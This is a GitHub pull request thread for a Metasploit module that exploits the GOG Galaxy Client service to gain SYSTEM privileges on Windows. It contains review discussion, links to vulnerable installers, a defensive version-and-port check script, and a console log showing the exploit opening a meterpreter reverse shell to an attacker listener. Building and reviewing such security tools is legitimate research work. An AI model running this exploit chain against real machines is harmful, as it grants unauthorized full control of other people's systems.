
GOG Galaxy Client Privilege Escalation Module #13444

Merged
merged 3 commits into from Jun 15, 2020

Conversation

jtesta
Contributor

@jtesta jtesta commented May 13, 2020

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting from a unique branch in your repository to master in Rapid7's.

Verification

List the steps needed to make sure this thing works

  • Gain shell on Windows host with GOG Galaxy Client v2.0.12 or earlier.
  • run post/windows/escalate/gog_galaxyclientservice_privesc
  • Verify that a user named newadmin was created.
  • Optionally, run again with ARGS="localgroup Administrators newadmin /add" to promote to local administrator.

@bcoles
Contributor

bcoles commented May 13, 2020

This should probably be implemented as an exploit/windows/local module to retrieve a new session, rather than requiring the operator to manually specify commands. Local exploit modules permit the user to specify an ARCH_CMD payload with an arbitrary command if they wish.

@bwatters-r7 bwatters-r7 added module needs-docs needs-linting The module needs additional work to pass our automated linting rules labels May 13, 2020
@label-actions

label-actions bot commented May 13, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7 bwatters-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label May 13, 2020
@rapid7 rapid7 deleted a comment from label-actions bot May 13, 2020
@gwillcox-r7
Contributor

@jtesta Hello Joe, have you gotten a CVE for this bug yet? If not @todb-r7 might be able to assist.

@jtesta
Contributor Author

jtesta commented May 13, 2020 via email

@todb-r7

todb-r7 commented May 13, 2020

> Hi Grant. Nope, I haven't gotten a CVE yet. Aside from @todb-r7, how would one go about reserving one nowadays?

So, I'm probably the easiest path for Metasploit stuff like this, but you're welcome to do it yourself at the CVE Request form, here: https://cveform.mitre.org/ (Doesn't look like GOG is a CNA).

Let me know if you want to do it yourself, or let me. I'm happy to assign one of R7's research CVEs to this (with you listed as the discoverer, of course).

As an aside, I saw in your writeup a screenshot of the private key you extracted from the binary. Would you mind contributing that to https://github.com/rapid7/ssh-badkeys ? That's basically the naughty step for misbehaving keys.

@jtesta
Contributor Author

jtesta commented May 13, 2020 via email

@todb-r7

todb-r7 commented May 13, 2020

> Would it still be appropriate to submit it to the ssh-badkeys repo in that case?

Oh maybe https://github.com/BenBE/kompromat is more appropriate for this. If you like.

Editing now to include the CVE!

Freshly reserved! Not populated yet!

@todb-r7

todb-r7 commented May 13, 2020

@jtesta I'm just a fan of over-sharing compromised keys, just in case they show up somewhere else. Distributed private keys should be double-tap killed.

@jtesta
Contributor Author

jtesta commented May 18, 2020

As @bcoles suggested, I moved the module into exploit/windows/local.

Documentation has been added as well.

Does this PR need anything else?

@bcoles bcoles added docs and removed needs-docs labels May 19, 2020
@gwillcox-r7
Contributor

@jtesta Your documentation needs proper instructions on where to get the vulnerable versions as well as how to set them up. Also your section ## Scenarios should also list which version and system you tested this on.

You can refer to @h00die's PR at https://github.com/rapid7/metasploit-framework/pull/13470/files for an example of how this should be formatted. Note the installation steps he provides, as well as the additional ### Pi-Hole 4.3 with AdminLTE 4.3 on Ubuntu 18.04 section he has under ## Scenarios. In your case you would need to make this something like ### GOG Galaxy version 1.2.64.2 on Windows 10 1909 x64.

For your installer steps I took the liberty of finding some appropriate downloads from GOG Galaxy's official servers. They are:

https://cdn.gog.com/open/galaxy/client/setup_galaxy_1.2.64.2.exe
https://cdn.gog.com/open/galaxy/client/setup_galaxy_2.0.12.48.exe

Given that the version number is a 4 part number, not a 3 part number, I would recommend updating your documentation to be more specific as to the versions affected. For example I couldn't find 1.2.64.0, nor could I find 1.2.64.1, so this is something that maybe should be considered in your explanation, whereby you could just say something like versions 1.2.64.x and prior were affected.

Otherwise looks good from an initial glance through, but will need to dive into this one deeper to check for additional issues.

@bcoles
Contributor

bcoles commented May 19, 2020

Does this PR need anything else?

Please update the module to use Metasploit payloads rather than commands specified in module options. This will also require specifying the appropriate arch and platform in the module info Hash.

Optionally, you can also add a second target with ARCH_CMD for using Windows command payloads, such as powershell commands. Although there are no existing Windows local exploits which do this, there are plenty of other examples from which you can steal code, such as freeswitch_event_socket_cmd_exec, which offers multiple targets.

@space-r7 space-r7 self-assigned this Jun 8, 2020
@space-r7
Contributor

space-r7 commented Jun 8, 2020

Hi @jtesta, I really enjoyed your writeup on this vulnerability! Just installed the client on a Windows machine, tested out your module, and it works great. As for making the suggested changes, will you have any bandwidth anytime soon? If not, I'd be happy to assist and get your module across the finish line. Thanks!

@jtesta
Contributor Author

jtesta commented Jun 9, 2020

@space-r7 Glad you enjoyed the write-up!

Unfortunately, I'm busy at the moment, but if you were able to help brush this up for merging, that would be great!

@space-r7
Contributor

> @space-r7 Glad you enjoyed the write-up!
>
> Unfortunately, I'm busy at the moment, but if you were able to help brush this up for merging, that would be great!

Can do! Thanks so much!

@space-r7
Contributor

Didn't have much luck with adding an ARCH_CMD target, so the module only uses the dropper method. Tested on Galaxy Client v1.2.66.64:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:50855) at 2020-06-15 08:35:15 -0500

meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc 
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check
[*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Starting GalaxyClientService...
[*] Service started successfully.
[*] Connecting to service...
[*] Writing C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe to target
[*] Connected to service.  Sending payload...
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:50857) at 2020-06-15 08:35:59 -0500
[+] Command executed successfully!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows

space-r7 added a commit that referenced this pull request Jun 15, 2020
@space-r7 space-r7 merged commit 5508bda into rapid7:master Jun 15, 2020
@space-r7
Contributor

space-r7 commented Jun 15, 2020

Release Notes

The GOG GalaxyClientService Privilege Escalation module targets vulnerable versions of the gaming software known as GOG Galaxy Client. The GalaxyClientService runs as SYSTEM and listens locally on port 9978 for commands. A user can connect to this service and issue commands to run, allowing for escalation to SYSTEM.
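Added example (not code from this PR or from the Metasploit module): a stand-alone Ruby check that combines the two facts the thread gives about the bug, the "v2.0.12 or earlier" cutoff from the PR description (with the four-part version numbering gwillcox-r7 points out) and the SYSTEM service listening locally on 9978/tcp from the release notes. The cutoff constant, function names and verdict symbols are assumptions made for this example; the service's wire protocol is not on the page, so the script only tests whether the port accepts a connection and sends nothing to it.

```ruby
require 'socket'

# Added example for this thread; it is not code from the PR or from the
# Metasploit module. It turns two facts stated in the discussion into a
# stand-alone exposure check:
#   * the PR description treats GOG Galaxy Client "v2.0.12 or earlier" as
#     vulnerable, and versions are four-part (1.2.64.2, 2.0.12.48);
#   * the release notes say GalaxyClientService runs as SYSTEM and listens
#     locally on 9978/tcp.
# The service's wire protocol is not described on the page, so this code
# only tests reachability; it never sends anything to the service.

GALAXY_SERVICE_PORT = 9978

# Assumption: the thread gives the cutoff as a three-part "2.0.12" with no
# patch level, so every 2.0.12.x build is treated as in scope.
LAST_VULNERABLE_PREFIX = [2, 0, 12].freeze

# "1.2.64.2" -> [1, 2, 64, 2]; "2.0.12" -> [2, 0, 12]. Rejects anything that
# is not 1..4 dot-separated unsigned integers (e.g. "2.0.12." or "1.2.3.4.5").
def parse_version(str)
  parts = str.to_s.strip.split('.', -1)
  raise ArgumentError, "bad version string: #{str.inspect}" if parts.empty? || parts.size > 4
  parts.map do |p|
    raise ArgumentError, "bad version component: #{p.inspect}" unless p.match?(/\A\d+\z/)
    p.to_i
  end
end

# Component-wise comparison with missing trailing components treated as 0,
# so 2.0.12 == 2.0.12.0 and 2.0.12.48 > 2.0.12. Returns -1, 0 or 1.
def compare_versions(a, b)
  width = [a.size, b.size].max
  (a + [0] * (width - a.size)) <=> (b + [0] * (width - b.size))
end

# Vulnerable when the first three components do not exceed 2.0.12. Comparing
# the prefix (rather than the full four-part value) is what makes 2.0.12.48
# count as vulnerable while 2.0.13.0 does not.
def vulnerable_version?(str)
  v = parse_version(str)
  compare_versions(v.first(LAST_VULNERABLE_PREFIX.size), LAST_VULNERABLE_PREFIX) <= 0
end

# True if a TCP connect to host:port succeeds. The service is bound to
# localhost, which is exactly why any local user can reach it.
def local_port_open?(port, host: '127.0.0.1', timeout: 1.0)
  Socket.tcp(host, port, connect_timeout: timeout) { true }
rescue SystemCallError, SocketError, IOError
  false
end

# Combine both signals. A version match with nothing listening is still not
# safe: the merged module's run output shows it starting GalaxyClientService
# itself before connecting, so the verdict symbol says so explicitly.
def assess(version_str, port: GALAXY_SERVICE_PORT)
  vuln = vulnerable_version?(version_str)
  listening = local_port_open?(port)
  verdict =
    if vuln && listening
      :appears_vulnerable
    elsif vuln
      :vulnerable_version_service_not_listening
    else
      :version_not_vulnerable
    end
  { version: version_str, vulnerable_version: vuln, service_listening: listening, verdict: verdict }
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample values, mirroring the versions mentioned in the thread.
  %w[1.2.64.2 1.2.66.64 2.0.12.48 2.0.13.0].each do |ver|
    puts assess(ver).inspect
  end
end
```

Run it on the target with `ruby galaxy_check.rb`; on a host where the client is not installed every verdict falls back to the version signal alone, and a vulnerable version with nothing listening should still be treated as exposed, because the module starts the service itself.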

@jtesta
Contributor Author

jtesta commented Jun 15, 2020

@space-r7 Thank you so much for taking the lead on this and getting it merged!

@space-r7
Contributor

> @space-r7 Thank you so much for taking the lead on this and getting it merged!

No problem! Thank you for the module!

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 19, 2020
Labels
docs module rn-modules release notes for new or majorly enhanced modules

7 participants